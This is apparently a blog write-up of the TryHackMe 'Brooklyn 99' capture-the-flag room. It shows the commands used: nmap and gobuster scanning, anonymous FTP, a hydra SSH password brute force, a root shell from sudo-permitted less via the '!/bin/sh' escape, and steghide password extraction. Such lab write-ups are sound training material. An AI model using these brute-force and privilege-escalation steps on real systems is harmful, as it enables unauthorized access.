TryHackMe: Brooklyn 99

Having fun with TryHackMe again. So, here is the write up and guideline to pass this Brooklyn 99 challenge.

Room: https://tryhackme.com/room/brooklynninenine
Level: Easy

Task: This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box.

The task says there is 2 method to access the root. Lets go all the way if can find it

As usual, open the IP in browser first.

There is a hint “Have you ever heard of steganography?”. Might be something from the wallpaper. Because Im too lazy, using online decoder, unfortunately, nothing!

But it’s okay, let’s run both gobuster and nmap.

# gobuster dir -u 10.10.61.X -w wordlists/dirb/common.txt -t 20

No luck from gobuster. Tried different directory dict also no luck.

# nmap -T4 -A -sS -sS -p- 10.10.61.61
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.163.74
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

Thats interesting. It says that FTP is allow anonymous login. Using Cyberduck,

There is only 1 file there says,

From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

There is no admin page or whatsoever, then SSH all the way using “jake” as username and brute the password

# hydra -l jake -P wordlists/rockyou.txt 10.10.162.161 ssh
...
[DATA] attacking ssh://10.10.162.161:22/
[22][ssh] host: 10.10.162.161 login: jake password: XXXXXXXXX
...

Ok that was easy.

# ssh jake@10.10.162.161
The authenticity of host '10.10.162.161 (10.10.162.161)' can't be established.
ECDSA key fingerprint is SHA256:Ofp49Dp4VBPb3v/vGM9jYfTRiwpg2v28x1uGhvoJ7K4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.162.161' (ECDSA) to the list of known hosts.
jake@10.10.162.161's password:
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$

Lets go through,

# ls /home
amy holt jake
# ls -al holt
-rw------- 1 root root 110 May 18 2020 nano.save
-rw-rw-r-- 1 holt holt 33 May 17 2020 user.txt
# cat /home/holt/user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXX

Ok now, user flag is captured. Now, we need to find the root hole.

# sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less

Oh! less command doesn’t need password. Let’s refer GTFObins then. Run this,

sudo less /etc/profile
!/bin/sh

Now root shell is available!

# ls -al /root
...
...
-rw-r--r-- 1 root root 135 May 18 2020 root.txt
# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine NineHere is the flag: 63a9f0ea7bb98050796bXXXXXXXXXXXXXEnjoy!!

Found the root flag!!.

BUT, if the CTF stated that there is another way to access the server. Let’s check first, SSH done✅ , FTP done✅, Directory brute ✅. What else missing? There is only 1 hint from the source code is “steganography”. But failed to decode earlier right? Password then? Where is the password?

Crack the password using stegcracker from github

# stegcracker ~/Downloads/brooklyn99.jpg ~/wordlists/rockyou.txt
Successfully cracked file with password: XXXXX Tried 20650 passwords Your file has been written to: /home/kapalbiru/Downloads/brooklyn99.jpg.out

Alright.. got the password

# steghide extract -sf ~/Downloads/brooklyn99.jpg                                                          Enter passphrase:                                                                                                                                                                                                                                        wrote extracted data to "note.txt".
# cat note.txt
Holts Password: XXXXXXXXXXXXXXXXXXXXXXXXX
Enjoy!!

So now make sense. That’s why user flag is located in holts folder.

Software Engineer at Teratotech.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store